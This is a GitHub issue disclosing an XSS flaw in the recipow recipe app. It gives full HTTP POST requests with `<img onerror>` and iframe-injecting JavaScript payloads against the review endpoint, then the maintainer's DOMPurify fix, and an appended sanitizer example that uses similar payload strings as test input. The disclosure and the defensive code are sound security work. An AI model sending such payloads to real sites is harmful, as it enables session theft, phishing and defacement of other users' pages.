typio / recipow

Recipe web app
https://recipow.com

XSS Vulnerability #36

Closed bear102 closed 1 year ago

bear102 commented 1 year ago

Greetings, it's bear.

I found a very scary vulnerability.

What can happen if a bad guy finds it:

- ddos
- xss (leak session id)
- html defacement
- any javascript execution on user browser
- malicious iframe (phishing, clickjacking, more scary stuff)
- even more scary stuff

The exploit:

By sending this specific HTTP POST request:

```http
POST /recipe/review HTTP/2
Host: www.recipow.com
Cookie: _ga=GA1.1.58669917.1689302410; sessionId=; _ga_VR9MW6WD01=GS1.1.1689302409.1.1.1689302473.0.0.0
Content-Length: 98
Sec-Ch-Ua: 
Sec-Ch-Ua-Platform: ""
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://www.recipow.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.recipow.com/@thomas/recipe-raweggslushie
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{"recipe":"@thomas/recipe-raweggslushie","rating":4.9375,"comment":"<img src/onerror=alert(1)>bb"}
```
There is an xss attack: `<img src/onerror=alert(1)>bb`. This can be used to steal the session id cookie and log in as other users. :(((

[Screenshot 2023-07-15 174353]

This is because the user is allowed to change the input, which is directly reflected into the html (very unsafe and scary!!).


Here is an example of executing javascript (also allowing for potentially malicious iframes):

```http
POST /recipe/review HTTP/2
Host: www.recipow.com
Cookie: _ga=GA1.1.58669917.1689302410; sessionId=dwadawda33t14; _ga_VR9MW6WD01=GS1.1.1689302409.1.1.1689302473.0.0.0
Content-Length: 597
Sec-Ch-Ua: 
Sec-Ch-Ua-Platform: ""
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://www.recipow.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.recipow.com/@thomas/recipe-raweggslushie
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{"recipe":"@thomas/recipe-raweggslushie","rating":4.9375,"comment":"<img src/onerror=\"var youtubeIframe = document.createElement('iframe');youtubeIframe.width = '560';youtubeIframe.height = '315';youtubeIframe.src = 'https://www.youtube.com/embed/yMDOin3yWhU';youtubeIframe.title = 'YouTube video player';youtubeIframe.frameBorder = '0';youtubeIframe.allow = 'accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share';youtubeIframe.allowFullscreen = true;document.getElementsByClassName('w-full my-12')[0].appendChild(youtubeIframe);\">clickme"}
```
This code embeds an iframe into another user's recipe page that shows a youtube video of bears. Remember this can be used to create a phishing page or show other content or deface the website or do many other things. Many other scary things!!! (cryptomining?)

[Screenshot 2023-07-15 174842]

I think you got the idea by now. You can also use this javascript to force all visitors to create new recipes with hundreds of images and send xss attacks from the victims' browsers, and it can be very bad. Very scary.

Summary: Exploit allows any user to abuse reflected xss to execute javascript on a victim browser. (very scary)

typio commented 1 year ago

@bear102 I fixed this exploit by sanitizing the review comment on the frontend with the DOMPurify library, which removes the onerror from the img tag. I didn't intend for images to be enabled in the review, but can see it being kind of cool, so I didn't blacklist the tag. The other place with carte blanche HTML rendering was the recipe writer, so I added the sanitizer there too.

Luckily this isn't a difficult vulnerability, just careless use of Svelte's "@html" which is only used on the recipe page.

I appreciate you discovering it and bringing it to my attention. Your contribution is highly valued. Thank you!
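As an added example (not code from the recipow project or its author), here are the two defensive choices the fix above chooses between, in plain JavaScript: escaping the comment so the browser shows it as text (what Svelte's `{comment}` binding does by default; only `{@html ...}` bypasses it), and an allowlist sanitizer that keeps an `<img>` but strips its `onerror`. The sanitizer, its tag allowlist, `safeUrl` and the sample comments are all constructed for illustration; it stands in for DOMPurify, which the real fix uses and which this teaching-sized version does not replace.

```javascript
// Added example, not recipow's code. Two defensive options for a user-supplied
// review comment that the page renders with {@html ...}:
//   (1) escape it, so it is displayed as literal text, or
//   (2) run it through an allowlist sanitizer, so only harmless markup survives.
// The sanitizer is a small stand-in for DOMPurify (what the actual fix uses).

// Option 1: escaping. Every character that can open markup becomes an entity.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Option 2: allowlist sanitizing. Anything not listed is dropped. Event-handler
// attributes (onerror, onclick, ...) are never listed, so they cannot survive.
// A Map (not a plain object) so tag names like "constructor" hit no prototype.
const ALLOWED_TAGS = new Map([
  ['b', new Set()], ['i', new Set()], ['em', new Set()], ['strong', new Set()],
  ['p', new Set()], ['br', new Set()],
  ['img', new Set(['src', 'alt'])],
  ['a', new Set(['href'])],
]);
const URL_ATTRS = new Set(['src', 'href']);

// Accept only http(s) absolute URLs or same-origin paths; rejects javascript:,
// data:, and protocol-relative "//host" forms.
function safeUrl(value) {
  const v = value.trim();
  return /^(https?:\/\/|\/(?!\/))/i.test(v) ? v : null;
}

// Text between tags: neutralise stray angle brackets, leave existing entities alone.
function escapeText(s) {
  return s.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function sanitizeHtml(input) {
  const tagRe = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/g;
  // Loose attribute grammar so that `src/onerror=alert(1)` is read the way a
  // browser reads it: two attributes, src (empty) and onerror.
  const attrRe = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'=<>`]+)))?/g;
  let out = '';
  let last = 0;
  let m;
  while ((m = tagRe.exec(input)) !== null) {
    out += escapeText(input.slice(last, m.index));
    last = tagRe.lastIndex;
    const [, closing, rawName, rawAttrs] = m;
    const name = rawName.toLowerCase();
    const allowedAttrs = ALLOWED_TAGS.get(name);
    if (!allowedAttrs) continue; // script, iframe, svg, ...: drop the tag, keep surrounding text
    if (closing) {
      out += `</${name}>`;
      continue;
    }
    let attrs = '';
    attrRe.lastIndex = 0;
    let a;
    while ((a = attrRe.exec(rawAttrs)) !== null) {
      const attrName = a[1].toLowerCase();
      if (!allowedAttrs.has(attrName)) continue; // drops onerror, style, srcdoc, ...
      let value = a[2] ?? a[3] ?? a[4] ?? '';
      if (URL_ATTRS.has(attrName)) {
        value = safeUrl(value);
        if (value === null) continue; // unsafe scheme: drop the attribute, keep the tag
      }
      attrs += ` ${attrName}="${escapeHtml(value)}"`;
    }
    out += `<${name}${attrs}>`;
  }
  out += escapeText(input.slice(last));
  return out;
}

// Constructed sample comments, shaped like the payloads in the report.
const SAMPLES = [
  '<img src/onerror=alert(1)>bb',
  '<img src="https://example.invalid/bear.jpg" alt="bear" onerror="alert(1)">',
  '<a href="javascript:alert(1)">click</a>',
  'tasty <script>alert(1)</script> 1 < 2',
  '<iframe src="https://example.invalid/"></iframe>text',
];

for (const s of SAMPLES) {
  console.log('escaped  :', escapeHtml(s));
  console.log('sanitized:', sanitizeHtml(s));
}
```

In a Svelte component the difference is `{comment}` (escaped automatically) versus `{@html sanitizeHtml(comment)}`; the bug in the report is `{@html comment}` with nothing in between. Sanitizing only on the frontend protects this renderer, but the raw comment is still stored, so any other consumer of it (an API, an email digest, a future template) has to repeat the step; sanitizing once on the server before storage, and again at render time, is the usual belt-and-braces arrangement.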